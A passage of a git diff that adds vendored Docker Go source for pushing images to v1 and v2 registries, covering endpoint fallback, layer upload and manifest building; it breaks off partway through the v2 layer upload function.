+// registry. The endpoint argument contains a Version field that determines
+// whether a v1 or v2 pusher will be created. The other parameters are passed
+// through to the underlying pusher implementation for use during the actual
+// push operation.
+func NewPusher(ref reference.Named, endpoint registry.APIEndpoint, repoInfo *registry.RepositoryInfo, imagePushConfig *ImagePushConfig) (Pusher, error) {
+	switch endpoint.Version {
+	case registry.APIVersion2:
+		return &v2Pusher{
+			v2MetadataService: metadata.NewV2MetadataService(imagePushConfig.MetadataStore),
+			ref:               ref,
+			endpoint:          endpoint,
+			repoInfo:          repoInfo,
+			config:            imagePushConfig,
+		}, nil
+	case registry.APIVersion1:
+		return &v1Pusher{
+			v1IDService: metadata.NewV1IDService(imagePushConfig.MetadataStore),
+			ref:         ref,
+			endpoint:    endpoint,
+			repoInfo:    repoInfo,
+			config:      imagePushConfig,
+		}, nil
+	}
+	return nil, fmt.Errorf("unknown version %d for registry %s", endpoint.Version, endpoint.URL)
+}
+
+// Push initiates a push operation on ref.
+// ref is the specific variant of the image to be pushed.
+// If no tag is provided, all tags will be pushed.
+func Push(ctx context.Context, ref reference.Named, imagePushConfig *ImagePushConfig) error {
+	// FIXME: Allow to interrupt current push when new push of same image is done.
+
+	// Resolve the Repository name from fqn to RepositoryInfo
+	repoInfo, err := imagePushConfig.RegistryService.ResolveRepository(ref)
+	if err != nil {
+		return err
+	}
+
+	endpoints, err := imagePushConfig.RegistryService.LookupPushEndpoints(repoInfo.Hostname())
+	if err != nil {
+		return err
+	}
+
+	progress.Messagef(imagePushConfig.ProgressOutput, "", "The push refers to a repository [%s]", repoInfo.FullName())
+
+	associations := imagePushConfig.ReferenceStore.ReferencesByName(repoInfo)
+	if len(associations) == 0 {
+		return fmt.Errorf("An image does not exist locally with the tag: %s", repoInfo.Name())
+	}
+
+	var (
+		lastErr error
+
+		// confirmedV2 is set to true if a push attempt managed to
+		// confirm that it was talking to a v2 registry. This will
+		// prevent fallback to the v1 protocol.
+		confirmedV2 bool
+
+		// confirmedTLSRegistries is a map indicating which registries
+		// are known to be using TLS. There should never be a plaintext
+		// retry for any of these.
+		confirmedTLSRegistries = make(map[string]struct{})
+	)
+
+	for _, endpoint := range endpoints {
+		if imagePushConfig.RequireSchema2 && endpoint.Version == registry.APIVersion1 {
+			continue
+		}
+		if confirmedV2 && endpoint.Version == registry.APIVersion1 {
+			logrus.Debugf("Skipping v1 endpoint %s because v2 registry was detected", endpoint.URL)
+			continue
+		}
+
+		if endpoint.URL.Scheme != "https" {
+			if _, confirmedTLS := confirmedTLSRegistries[endpoint.URL.Host]; confirmedTLS {
+				logrus.Debugf("Skipping non-TLS endpoint %s for host/port that appears to use TLS", endpoint.URL)
+				continue
+			}
+		}
+
+		logrus.Debugf("Trying to push %s to %s %s", repoInfo.FullName(), endpoint.URL, endpoint.Version)
+
+		pusher, err := NewPusher(ref, endpoint, repoInfo, imagePushConfig)
+		if err != nil {
+			lastErr = err
+			continue
+		}
+		if err := pusher.Push(ctx); err != nil {
+			// Was this push cancelled? If so, don't try to fall
+			// back.
+			select {
+			case <-ctx.Done():
+			default:
+				if fallbackErr, ok := err.(fallbackError); ok {
+					confirmedV2 = confirmedV2 || fallbackErr.confirmedV2
+					if fallbackErr.transportOK && endpoint.URL.Scheme == "https" {
+						confirmedTLSRegistries[endpoint.URL.Host] = struct{}{}
+					}
+					err = fallbackErr.err
+					lastErr = err
+					logrus.Errorf("Attempting next endpoint for push after error: %v", err)
+					continue
+				}
+			}
+
+			logrus.Errorf("Not continuing with push after error: %v", err)
+			return err
+		}
+
+		imagePushConfig.ImageEventLogger(ref.String(), repoInfo.Name(), "push")
+		return nil
+	}
+
+	if lastErr == nil {
+		lastErr = fmt.Errorf("no endpoints found for %s", repoInfo.FullName())
+	}
+	return lastErr
+}
+
+// compress returns an io.ReadCloser which will supply a compressed version of
+// the provided Reader. The caller must close the ReadCloser after reading the
+// compressed data.
+//
+// Note that this function returns a reader instead of taking a writer as an
+// argument so that it can be used with httpBlobWriter's ReadFrom method.
+// Using httpBlobWriter's Write method would send a PATCH request for every
+// Write call.
+//
+// The second return value is a channel that gets closed when the goroutine
+// is finished. This allows the caller to make sure the goroutine finishes
+// before it releases any resources connected with the reader that was
+// passed in.
+func compress(in io.Reader) (io.ReadCloser, chan struct{}) {
+	compressionDone := make(chan struct{})
+
+	pipeReader, pipeWriter := io.Pipe()
+	// Use a bufio.Writer to avoid excessive chunking in HTTP request.
+	bufWriter := bufio.NewWriterSize(pipeWriter, compressionBufSize)
+	compressor := gzip.NewWriter(bufWriter)
+
+	go func() {
+		_, err := io.Copy(compressor, in)
+		if err == nil {
+			err = compressor.Close()
+		}
+		if err == nil {
+			err = bufWriter.Flush()
+		}
+		if err != nil {
+			pipeWriter.CloseWithError(err)
+		} else {
+			pipeWriter.Close()
+		}
+		close(compressionDone)
+	}()
+
+	return pipeReader, compressionDone
+}
diff --git a/vendor/github.com/docker/docker/distribution/push_v1.go b/vendor/github.com/docker/docker/distribution/push_v1.go
new file mode 100644
index 0000000000..257ac181ec
--- /dev/null
+++ b/vendor/github.com/docker/docker/distribution/push_v1.go
@@ -0,0 +1,463 @@
+package distribution
+
+import (
+	"fmt"
+	"sync"
+
+	"github.com/Sirupsen/logrus"
+	"github.com/docker/distribution/digest"
+	"github.com/docker/distribution/registry/client/transport"
+	"github.com/docker/docker/distribution/metadata"
+	"github.com/docker/docker/dockerversion"
+	"github.com/docker/docker/image"
+	"github.com/docker/docker/image/v1"
+	"github.com/docker/docker/layer"
+	"github.com/docker/docker/pkg/ioutils"
+	"github.com/docker/docker/pkg/progress"
+	"github.com/docker/docker/pkg/stringid"
+	"github.com/docker/docker/reference"
+	"github.com/docker/docker/registry"
+	"golang.org/x/net/context"
+)
+
+type v1Pusher struct {
+	v1IDService *metadata.V1IDService
+	endpoint    registry.APIEndpoint
+	ref         reference.Named
+	repoInfo    *registry.RepositoryInfo
+	config      *ImagePushConfig
+	session     *registry.Session
+}
+
+func (p *v1Pusher) Push(ctx context.Context) error {
+	tlsConfig, err := p.config.RegistryService.TLSConfig(p.repoInfo.Index.Name)
+	if err != nil {
+		return err
+	}
+	// Adds Docker-specific headers as well as user-specified headers (metaHeaders)
+	tr := transport.NewTransport(
+		// TODO(tiborvass): was NoTimeout
+		registry.NewTransport(tlsConfig),
+		registry.DockerHeaders(dockerversion.DockerUserAgent(ctx), p.config.MetaHeaders)...,
+	)
+	client := registry.HTTPClient(tr)
+	v1Endpoint, err := p.endpoint.ToV1Endpoint(dockerversion.DockerUserAgent(ctx), p.config.MetaHeaders)
+	if err != nil {
+		logrus.Debugf("Could not get v1 endpoint: %v", err)
+		return fallbackError{err: err}
+	}
+	p.session, err = registry.NewSession(client, p.config.AuthConfig, v1Endpoint)
+	if err != nil {
+		// TODO(dmcgowan): Check if should fallback
+		return fallbackError{err: err}
+	}
+	if err := p.pushRepository(ctx); err != nil {
+		// TODO(dmcgowan): Check if should fallback
+		return err
+	}
+	return nil
+}
+
+// v1Image exposes the configuration, filesystem layer ID, and a v1 ID for an
+// image being pushed to a v1 registry.
+type v1Image interface {
+	Config() []byte
+	Layer() layer.Layer
+	V1ID() string
+}
+
+type v1ImageCommon struct {
+	layer  layer.Layer
+	config []byte
+	v1ID   string
+}
+
+func (common *v1ImageCommon) Config() []byte {
+	return common.config
+}
+
+func (common *v1ImageCommon) V1ID() string {
+	return common.v1ID
+}
+
+func (common *v1ImageCommon) Layer() layer.Layer {
+	return common.layer
+}
+
+// v1TopImage defines a runnable (top layer) image being pushed to a v1
+// registry.
+type v1TopImage struct {
+	v1ImageCommon
+	imageID image.ID
+}
+
+func newV1TopImage(imageID image.ID, img *image.Image, l layer.Layer, parent *v1DependencyImage) (*v1TopImage, error) {
+	v1ID := imageID.Digest().Hex()
+	parentV1ID := ""
+	if parent != nil {
+		parentV1ID = parent.V1ID()
+	}
+
+	config, err := v1.MakeV1ConfigFromConfig(img, v1ID, parentV1ID, false)
+	if err != nil {
+		return nil, err
+	}
+
+	return &v1TopImage{
+		v1ImageCommon: v1ImageCommon{
+			v1ID:   v1ID,
+			config: config,
+			layer:  l,
+		},
+		imageID: imageID,
+	}, nil
+}
+
+// v1DependencyImage defines a dependency layer being pushed to a v1 registry.
+type v1DependencyImage struct {
+	v1ImageCommon
+}
+
+func newV1DependencyImage(l layer.Layer, parent *v1DependencyImage) (*v1DependencyImage, error) {
+	v1ID := digest.Digest(l.ChainID()).Hex()
+
+	config := ""
+	if parent != nil {
+		config = fmt.Sprintf(`{"id":"%s","parent":"%s"}`, v1ID, parent.V1ID())
+	} else {
+		config = fmt.Sprintf(`{"id":"%s"}`, v1ID)
+	}
+	return &v1DependencyImage{
+		v1ImageCommon: v1ImageCommon{
+			v1ID:   v1ID,
+			config: []byte(config),
+			layer:  l,
+		},
+	}, nil
+}
+
+// Retrieve the all the images to be uploaded in the correct order
+func (p *v1Pusher) getImageList() (imageList []v1Image, tagsByImage map[image.ID][]string, referencedLayers []PushLayer, err error) {
+	tagsByImage = make(map[image.ID][]string)
+
+	// Ignore digest references
+	if _, isCanonical := p.ref.(reference.Canonical); isCanonical {
+		return
+	}
+
+	tagged, isTagged := p.ref.(reference.NamedTagged)
+	if isTagged {
+		// Push a specific tag
+		var imgID image.ID
+		var dgst digest.Digest
+		dgst, err = p.config.ReferenceStore.Get(p.ref)
+		if err != nil {
+			return
+		}
+		imgID = image.IDFromDigest(dgst)
+
+		imageList, err = p.imageListForTag(imgID, nil, &referencedLayers)
+		if err != nil {
+			return
+		}
+
+		tagsByImage[imgID] = []string{tagged.Tag()}
+
+		return
+	}
+
+	imagesSeen := make(map[digest.Digest]struct{})
+	dependenciesSeen := make(map[layer.ChainID]*v1DependencyImage)
+
+	associations := p.config.ReferenceStore.ReferencesByName(p.ref)
+	for _, association := range associations {
+		if tagged, isTagged = association.Ref.(reference.NamedTagged); !isTagged {
+			// Ignore digest references.
+			continue
+		}
+
+		imgID := image.IDFromDigest(association.ID)
+		tagsByImage[imgID] = append(tagsByImage[imgID], tagged.Tag())
+
+		if _, present := imagesSeen[association.ID]; present {
+			// Skip generating image list for already-seen image
+			continue
+		}
+		imagesSeen[association.ID] = struct{}{}
+
+		imageListForThisTag, err := p.imageListForTag(imgID, dependenciesSeen, &referencedLayers)
+		if err != nil {
+			return nil, nil, nil, err
+		}
+
+		// append to main image list
+		imageList = append(imageList, imageListForThisTag...)
+	}
+	if len(imageList) == 0 {
+		return nil, nil, nil, fmt.Errorf("No images found for the requested repository / tag")
+	}
+	logrus.Debugf("Image list: %v", imageList)
+	logrus.Debugf("Tags by image: %v", tagsByImage)
+
+	return
+}
+
+func (p *v1Pusher) imageListForTag(imgID image.ID, dependenciesSeen map[layer.ChainID]*v1DependencyImage, referencedLayers *[]PushLayer) (imageListForThisTag []v1Image, err error) {
+	ics, ok := p.config.ImageStore.(*imageConfigStore)
+	if !ok {
+		return nil, fmt.Errorf("only image store images supported for v1 push")
+	}
+	img, err := ics.Store.Get(imgID)
+	if err != nil {
+		return nil, err
+	}
+
+	topLayerID := img.RootFS.ChainID()
+
+	pl, err := p.config.LayerStore.Get(topLayerID)
+	*referencedLayers = append(*referencedLayers, pl)
+	if err != nil {
+		return nil, fmt.Errorf("failed to get top layer from image: %v", err)
+	}
+
+	// V1 push is deprecated, only support existing layerstore layers
+	lsl, ok := pl.(*storeLayer)
+	if !ok {
+		return nil, fmt.Errorf("only layer store layers supported for v1 push")
+	}
+	l := lsl.Layer
+
+	dependencyImages, parent, err := generateDependencyImages(l.Parent(), dependenciesSeen)
+	if err != nil {
+		return nil, err
+	}
+
+	topImage, err := newV1TopImage(imgID, img, l, parent)
+	if err != nil {
+		return nil, err
+	}
+
+	imageListForThisTag = append(dependencyImages, topImage)
+
+	return
+}
+
+func generateDependencyImages(l layer.Layer, dependenciesSeen map[layer.ChainID]*v1DependencyImage) (imageListForThisTag []v1Image, parent *v1DependencyImage, err error) {
+	if l == nil {
+		return nil, nil, nil
+	}
+
+	imageListForThisTag, parent, err = generateDependencyImages(l.Parent(), dependenciesSeen)
+
+	if dependenciesSeen != nil {
+		if dependencyImage, present := dependenciesSeen[l.ChainID()]; present {
+			// This layer is already on the list, we can ignore it
+			// and all its parents.
+			return imageListForThisTag, dependencyImage, nil
+		}
+	}
+
+	dependencyImage, err := newV1DependencyImage(l, parent)
+	if err != nil {
+		return nil, nil, err
+	}
+	imageListForThisTag = append(imageListForThisTag, dependencyImage)
+
+	if dependenciesSeen != nil {
+		dependenciesSeen[l.ChainID()] = dependencyImage
+	}
+
+	return imageListForThisTag, dependencyImage, nil
+}
+
+// createImageIndex returns an index of an image's layer IDs and tags.
+func createImageIndex(images []v1Image, tags map[image.ID][]string) []*registry.ImgData {
+	var imageIndex []*registry.ImgData
+	for _, img := range images {
+		v1ID := img.V1ID()
+
+		if topImage, isTopImage := img.(*v1TopImage); isTopImage {
+			if tags, hasTags := tags[topImage.imageID]; hasTags {
+				// If an image has tags you must add an entry in the image index
+				// for each tag
+				for _, tag := range tags {
+					imageIndex = append(imageIndex, &registry.ImgData{
+						ID:  v1ID,
+						Tag: tag,
+					})
+				}
+				continue
+			}
+		}
+
+		// If the image does not have a tag it still needs to be sent to the
+		// registry with an empty tag so that it is associated with the repository
+		imageIndex = append(imageIndex, &registry.ImgData{
+			ID:  v1ID,
+			Tag: "",
+		})
+	}
+	return imageIndex
+}
+
+// lookupImageOnEndpoint checks the specified endpoint to see if an image exists
+// and if it is absent then it sends the image id to the channel to be pushed.
+func (p *v1Pusher) lookupImageOnEndpoint(wg *sync.WaitGroup, endpoint string, images chan v1Image, imagesToPush chan string) {
+	defer wg.Done()
+	for image := range images {
+		v1ID := image.V1ID()
+		truncID := stringid.TruncateID(image.Layer().DiffID().String())
+		if err := p.session.LookupRemoteImage(v1ID, endpoint); err != nil {
+			logrus.Errorf("Error in LookupRemoteImage: %s", err)
+			imagesToPush <- v1ID
+			progress.Update(p.config.ProgressOutput, truncID, "Waiting")
+		} else {
+			progress.Update(p.config.ProgressOutput, truncID, "Already exists")
+		}
+	}
+}
+
+func (p *v1Pusher) pushImageToEndpoint(ctx context.Context, endpoint string, imageList []v1Image, tags map[image.ID][]string, repo *registry.RepositoryData) error {
+	workerCount := len(imageList)
+	// start a maximum of 5 workers to check if images exist on the specified endpoint.
+	if workerCount > 5 {
+		workerCount = 5
+	}
+	var (
+		wg           = &sync.WaitGroup{}
+		imageData    = make(chan v1Image, workerCount*2)
+		imagesToPush = make(chan string, workerCount*2)
+		pushes       = make(chan map[string]struct{}, 1)
+	)
+	for i := 0; i < workerCount; i++ {
+		wg.Add(1)
+		go p.lookupImageOnEndpoint(wg, endpoint, imageData, imagesToPush)
+	}
+	// start a go routine that consumes the images to push
+	go func() {
+		shouldPush := make(map[string]struct{})
+		for id := range imagesToPush {
+			shouldPush[id] = struct{}{}
+		}
+		pushes <- shouldPush
+	}()
+	for _, v1Image := range imageList {
+		imageData <- v1Image
+	}
+	// close the channel to notify the workers that there will be no more images to check.
+	close(imageData)
+	wg.Wait()
+	close(imagesToPush)
+	// wait for all the images that require pushes to be collected into a consumable map.
+	shouldPush := <-pushes
+	// finish by pushing any images and tags to the endpoint.  The order that the images are pushed
+	// is very important that is why we are still iterating over the ordered list of imageIDs.
+	for _, img := range imageList {
+		v1ID := img.V1ID()
+		if _, push := shouldPush[v1ID]; push {
+			if _, err := p.pushImage(ctx, img, endpoint); err != nil {
+				// FIXME: Continue on error?
+				return err
+			}
+		}
+		if topImage, isTopImage := img.(*v1TopImage); isTopImage {
+			for _, tag := range tags[topImage.imageID] {
+				progress.Messagef(p.config.ProgressOutput, "", "Pushing tag for rev [%s] on {%s}", stringid.TruncateID(v1ID), endpoint+"repositories/"+p.repoInfo.RemoteName()+"/tags/"+tag)
+				if err := p.session.PushRegistryTag(p.repoInfo, v1ID, tag, endpoint); err != nil {
+					return err
+				}
+			}
+		}
+	}
+	return nil
+}
+
+// pushRepository pushes layers that do not already exist on the registry.
+func (p *v1Pusher) pushRepository(ctx context.Context) error {
+	imgList, tags, referencedLayers, err := p.getImageList()
+	defer func() {
+		for _, l := range referencedLayers {
+			l.Release()
+		}
+	}()
+	if err != nil {
+		return err
+	}
+
+	imageIndex := createImageIndex(imgList, tags)
+	for _, data := range imageIndex {
+		logrus.Debugf("Pushing ID: %s with Tag: %s", data.ID, data.Tag)
+	}
+
+	// Register all the images in a repository with the registry
+	// If an image is not in this list it will not be associated with the repository
+	repoData, err := p.session.PushImageJSONIndex(p.repoInfo, imageIndex, false, nil)
+	if err != nil {
+		return err
+	}
+	// push the repository to each of the endpoints only if it does not exist.
+	for _, endpoint := range repoData.Endpoints {
+		if err := p.pushImageToEndpoint(ctx, endpoint, imgList, tags, repoData); err != nil {
+			return err
+		}
+	}
+	_, err = p.session.PushImageJSONIndex(p.repoInfo, imageIndex, true, repoData.Endpoints)
+	return err
+}
+
+func (p *v1Pusher) pushImage(ctx context.Context, v1Image v1Image, ep string) (checksum string, err error) {
+	l := v1Image.Layer()
+	v1ID := v1Image.V1ID()
+	truncID := stringid.TruncateID(l.DiffID().String())
+
+	jsonRaw := v1Image.Config()
+	progress.Update(p.config.ProgressOutput, truncID, "Pushing")
+
+	// General rule is to use ID for graph accesses and compatibilityID for
+	// calls to session.registry()
+	imgData := &registry.ImgData{
+		ID: v1ID,
+	}
+
+	// Send the json
+	if err := p.session.PushImageJSONRegistry(imgData, jsonRaw, ep); err != nil {
+		if err == registry.ErrAlreadyExists {
+			progress.Update(p.config.ProgressOutput, truncID, "Image already pushed, skipping")
+			return "", nil
+		}
+		return "", err
+	}
+
+	arch, err := l.TarStream()
+	if err != nil {
+		return "", err
+	}
+	defer arch.Close()
+
+	// don't care if this fails; best effort
+	size, _ := l.DiffSize()
+
+	// Send the layer
+	logrus.Debugf("rendered layer for %s of [%d] size", v1ID, size)
+
+	reader := progress.NewProgressReader(ioutils.NewCancelReadCloser(ctx, arch), p.config.ProgressOutput, size, truncID, "Pushing")
+	defer reader.Close()
+
+	checksum, checksumPayload, err := p.session.PushImageLayerRegistry(v1ID, reader, ep, jsonRaw)
+	if err != nil {
+		return "", err
+	}
+	imgData.Checksum = checksum
+	imgData.ChecksumPayload = checksumPayload
+	// Send the checksum
+	if err := p.session.PushImageChecksumRegistry(imgData, ep); err != nil {
+		return "", err
+	}
+
+	if err := p.v1IDService.Set(v1ID, p.repoInfo.Index.Name, l.DiffID()); err != nil {
+		logrus.Warnf("Could not set v1 ID mapping: %v", err)
+	}
+
+	progress.Update(p.config.ProgressOutput, truncID, "Image successfully pushed")
+	return imgData.Checksum, nil
+}
diff --git a/vendor/github.com/docker/docker/distribution/push_v2.go b/vendor/github.com/docker/docker/distribution/push_v2.go
new file mode 100644
index 0000000000..1f8c822fec
--- /dev/null
+++ b/vendor/github.com/docker/docker/distribution/push_v2.go
@@ -0,0 +1,697 @@
+package distribution
+
+import (
+	"errors"
+	"fmt"
+	"io"
+	"runtime"
+	"sort"
+	"strings"
+	"sync"
+
+	"golang.org/x/net/context"
+
+	"github.com/Sirupsen/logrus"
+	"github.com/docker/distribution"
+	"github.com/docker/distribution/digest"
+	"github.com/docker/distribution/manifest/schema1"
+	"github.com/docker/distribution/manifest/schema2"
+	distreference "github.com/docker/distribution/reference"
+	"github.com/docker/distribution/registry/client"
+	"github.com/docker/docker/distribution/metadata"
+	"github.com/docker/docker/distribution/xfer"
+	"github.com/docker/docker/layer"
+	"github.com/docker/docker/pkg/ioutils"
+	"github.com/docker/docker/pkg/progress"
+	"github.com/docker/docker/pkg/stringid"
+	"github.com/docker/docker/reference"
+	"github.com/docker/docker/registry"
+)
+
+const (
+	smallLayerMaximumSize  = 100 * (1 << 10) // 100KB
+	middleLayerMaximumSize = 10 * (1 << 20)  // 10MB
+)
+
+// PushResult contains the tag, manifest digest, and manifest size from the
+// push. It's used to signal this information to the trust code in the client
+// so it can sign the manifest if necessary.
+type PushResult struct {
+	Tag    string
+	Digest digest.Digest
+	Size   int
+}
+
+type v2Pusher struct {
+	v2MetadataService metadata.V2MetadataService
+	ref               reference.Named
+	endpoint          registry.APIEndpoint
+	repoInfo          *registry.RepositoryInfo
+	config            *ImagePushConfig
+	repo              distribution.Repository
+
+	// pushState is state built by the Upload functions.
+	pushState pushState
+}
+
+type pushState struct {
+	sync.Mutex
+	// remoteLayers is the set of layers known to exist on the remote side.
+	// This avoids redundant queries when pushing multiple tags that
+	// involve the same layers. It is also used to fill in digest and size
+	// information when building the manifest.
+	remoteLayers map[layer.DiffID]distribution.Descriptor
+	// confirmedV2 is set to true if we confirm we're talking to a v2
+	// registry. This is used to limit fallbacks to the v1 protocol.
+	confirmedV2 bool
+}
+
+func (p *v2Pusher) Push(ctx context.Context) (err error) {
+	p.pushState.remoteLayers = make(map[layer.DiffID]distribution.Descriptor)
+
+	p.repo, p.pushState.confirmedV2, err = NewV2Repository(ctx, p.repoInfo, p.endpoint, p.config.MetaHeaders, p.config.AuthConfig, "push", "pull")
+	if err != nil {
+		logrus.Debugf("Error getting v2 registry: %v", err)
+		return err
+	}
+
+	if err = p.pushV2Repository(ctx); err != nil {
+		if continueOnError(err) {
+			return fallbackError{
+				err:         err,
+				confirmedV2: p.pushState.confirmedV2,
+				transportOK: true,
+			}
+		}
+	}
+	return err
+}
+
+func (p *v2Pusher) pushV2Repository(ctx context.Context) (err error) {
+	if namedTagged, isNamedTagged := p.ref.(reference.NamedTagged); isNamedTagged {
+		imageID, err := p.config.ReferenceStore.Get(p.ref)
+		if err != nil {
+			return fmt.Errorf("tag does not exist: %s", p.ref.String())
+		}
+
+		return p.pushV2Tag(ctx, namedTagged, imageID)
+	}
+
+	if !reference.IsNameOnly(p.ref) {
+		return errors.New("cannot push a digest reference")
+	}
+
+	// Pull all tags
+	pushed := 0
+	for _, association := range p.config.ReferenceStore.ReferencesByName(p.ref) {
+		if namedTagged, isNamedTagged := association.Ref.(reference.NamedTagged); isNamedTagged {
+			pushed++
+			if err := p.pushV2Tag(ctx, namedTagged, association.ID); err != nil {
+				return err
+			}
+		}
+	}
+
+	if pushed == 0 {
+		return fmt.Errorf("no tags to push for %s", p.repoInfo.Name())
+	}
+
+	return nil
+}
+
+func (p *v2Pusher) pushV2Tag(ctx context.Context, ref reference.NamedTagged, id digest.Digest) error {
+	logrus.Debugf("Pushing repository: %s", ref.String())
+
+	imgConfig, err := p.config.ImageStore.Get(id)
+	if err != nil {
+		return fmt.Errorf("could not find image from tag %s: %v", ref.String(), err)
+	}
+
+	rootfs, err := p.config.ImageStore.RootFSFromConfig(imgConfig)
+	if err != nil {
+		return fmt.Errorf("unable to get rootfs for image %s: %s", ref.String(), err)
+	}
+
+	l, err := p.config.LayerStore.Get(rootfs.ChainID())
+	if err != nil {
+		return fmt.Errorf("failed to get top layer from image: %v", err)
+	}
+	defer l.Release()
+
+	hmacKey, err := metadata.ComputeV2MetadataHMACKey(p.config.AuthConfig)
+	if err != nil {
+		return fmt.Errorf("failed to compute hmac key of auth config: %v", err)
+	}
+
+	var descriptors []xfer.UploadDescriptor
+
+	descriptorTemplate := v2PushDescriptor{
+		v2MetadataService: p.v2MetadataService,
+		hmacKey:           hmacKey,
+		repoInfo:          p.repoInfo,
+		ref:               p.ref,
+		repo:              p.repo,
+		pushState:         &p.pushState,
+	}
+
+	// Loop bounds condition is to avoid pushing the base layer on Windows.
+	for i := 0; i < len(rootfs.DiffIDs); i++ {
+		descriptor := descriptorTemplate
+		descriptor.layer = l
+		descriptor.checkedDigests = make(map[digest.Digest]struct{})
+		descriptors = append(descriptors, &descriptor)
+
+		l = l.Parent()
+	}
+
+	if err := p.config.UploadManager.Upload(ctx, descriptors, p.config.ProgressOutput); err != nil {
+		return err
+	}
+
+	// Try schema2 first
+	builder := schema2.NewManifestBuilder(p.repo.Blobs(ctx), p.config.ConfigMediaType, imgConfig)
+	manifest, err := manifestFromBuilder(ctx, builder, descriptors)
+	if err != nil {
+		return err
+	}
+
+	manSvc, err := p.repo.Manifests(ctx)
+	if err != nil {
+		return err
+	}
+
+	putOptions := []distribution.ManifestServiceOption{distribution.WithTag(ref.Tag())}
+	if _, err = manSvc.Put(ctx, manifest, putOptions...); err != nil {
+		if runtime.GOOS == "windows" || p.config.TrustKey == nil || p.config.RequireSchema2 {
+			logrus.Warnf("failed to upload schema2 manifest: %v", err)
+			return err
+		}
+
+		logrus.Warnf("failed to upload schema2 manifest: %v - falling back to schema1", err)
+
+		manifestRef, err := distreference.WithTag(p.repo.Named(), ref.Tag())
+		if err != nil {
+			return err
+		}
+		builder = schema1.NewConfigManifestBuilder(p.repo.Blobs(ctx), p.config.TrustKey, manifestRef, imgConfig)
+		manifest, err = manifestFromBuilder(ctx, builder, descriptors)
+		if err != nil {
+			return err
+		}
+
+		if _, err = manSvc.Put(ctx, manifest, putOptions...); err != nil {
+			return err
+		}
+	}
+
+	var canonicalManifest []byte
+
+	switch v := manifest.(type) {
+	case *schema1.SignedManifest:
+		canonicalManifest = v.Canonical
+	case *schema2.DeserializedManifest:
+		_, canonicalManifest, err = v.Payload()
+		if err != nil {
+			return err
+		}
+	}
+
+	manifestDigest := digest.FromBytes(canonicalManifest)
+	progress.Messagef(p.config.ProgressOutput, "", "%s: digest: %s size: %d", ref.Tag(), manifestDigest, len(canonicalManifest))
+
+	if err := addDigestReference(p.config.ReferenceStore, ref, manifestDigest, id); err != nil {
+		return err
+	}
+
+	// Signal digest to the trust client so it can sign the
+	// push, if appropriate.
+	progress.Aux(p.config.ProgressOutput, PushResult{Tag: ref.Tag(), Digest: manifestDigest, Size: len(canonicalManifest)})
+
+	return nil
+}
+
+func manifestFromBuilder(ctx context.Context, builder distribution.ManifestBuilder, descriptors []xfer.UploadDescriptor) (distribution.Manifest, error) {
+	// descriptors is in reverse order; iterate backwards to get references
+	// appended in the right order.
+	for i := len(descriptors) - 1; i >= 0; i-- {
+		if err := builder.AppendReference(descriptors[i].(*v2PushDescriptor)); err != nil {
+			return nil, err
+		}
+	}
+
+	return builder.Build(ctx)
+}
+
+type v2PushDescriptor struct {
+	layer             PushLayer
+	v2MetadataService metadata.V2MetadataService
+	hmacKey           []byte
+	repoInfo          reference.Named
+	ref               reference.Named
+	repo              distribution.Repository
+	pushState         *pushState
+	remoteDescriptor  distribution.Descriptor
+	// a set of digests whose presence has been checked in a target repository
+	checkedDigests map[digest.Digest]struct{}
+}
+
+func (pd *v2PushDescriptor) Key() string {
+	return "v2push:" + pd.ref.FullName() + " " + pd.layer.DiffID().String()
+}
+
+func (pd *v2PushDescriptor) ID() string {
+	return stringid.TruncateID(pd.layer.DiffID().String())
+}
+
+func (pd *v2PushDescriptor) DiffID() layer.DiffID {
+	return pd.layer.DiffID()
+}
+
+func (pd *v2PushDescriptor) Upload(ctx context.Context, progressOutput progress.Output) (distribution.Descriptor, error) {
+	if fs, ok := pd.layer.(distribution.Describable); ok {
+		if d := fs.Descriptor(); len(d.URLs) > 0 {
+			progress.Update(progressOutput, pd.ID(), "Skipped foreign layer")
+			return d, nil
+		}
+	}
+
+	diffID := pd.DiffID()
+
+	pd.pushState.Lock()
+	if descriptor, ok := pd.pushState.remoteLayers[diffID]; ok {
+		// it is already known that the push is not needed and
+		// therefore doing a stat is unnecessary
+		pd.pushState.Unlock()
+		progress.Update(progressOutput, pd.ID(), "Layer already exists")
+		return descriptor, nil
+	}
+	pd.pushState.Unlock()
+
+	maxMountAttempts, maxExistenceChecks, checkOtherRepositories := getMaxMountAndExistenceCheckAttempts(pd.layer)
+
+	// Do we have any metadata associated with this layer's DiffID?
+	v2Metadata, err := pd.v2MetadataService.GetMetadata(diffID)
+	if err == nil {
+		// check for blob existence in the target repository if we have a mapping with it
+		descriptor, exists, err := pd.layerAlreadyExists(ctx, progressOutput, diffID, false, 1, v2Metadata)
+		if exists || err != nil {
+			return descriptor, err
+		}
+	}
+
+	// if digest was empty or not saved, or if blob does not exist on the remote repository,
+	// then push the blob.
+	bs := pd.repo.Blobs(ctx)
+
+	var layerUpload distribution.BlobWriter
+
+	// Attempt to find another repository in the same registry to mount the layer from to avoid an unnecessary upload
+	candidates := getRepositoryMountCandidates(pd.repoInfo, pd.hmacKey, maxMountAttempts, v2Metadata)
+	for _, mountCandidate := range candidates {
+		logrus.Debugf("attempting to mount layer %s (%s) from %s", diffID, mountCandidate.Digest, mountCandidate.SourceRepository)
+		createOpts := []distribution.BlobCreateOption{}
+
+		if len(mountCandidate.SourceRepository) > 0 {
+			namedRef, err := reference.WithName(mountCandidate.SourceRepository)
+			if err != nil {
+				logrus.Errorf("failed to parse source repository reference %v: %v", namedRef.String(), err)
+				pd.v2MetadataService.Remove(mountCandidate)
+				continue
+			}
+
+			// TODO (brianbland): We need to construct a reference where the Name is
+			// only the full remote name, so clean this up when distribution has a
+			// richer reference package
+			remoteRef, err := distreference.WithName(namedRef.RemoteName())
+			if err != nil {
+				logrus.Errorf("failed to make remote reference out of %q: %v", namedRef.RemoteName(), namedRef.RemoteName())
+				continue
+			}
+
+			canonicalRef, err := distreference.WithDigest(distreference.TrimNamed(remoteRef), mountCandidate.Digest)
+			if err != nil {
+				logrus.Errorf("failed to make canonical reference: %v", err)
+				continue
+			}
+
+			createOpts = append(createOpts, client.WithMountFrom(canonicalRef))
+		}
+
+		// send the layer
+		lu, err := bs.Create(ctx, createOpts...)
+		switch err := err.(type) {
+		case nil:
+			// noop
+		case distribution.ErrBlobMounted:
+			progress.Updatef(progressOutput, pd.ID(), "Mounted from %s", err.From.Name())
+
+			err.Descriptor.MediaType = schema2.MediaTypeLayer
+
+			pd.pushState.Lock()
+			pd.pushState.confirmedV2 = true
+			pd.pushState.remoteLayers[diffID] = err.Descriptor
+			pd.pushState.Unlock()
+
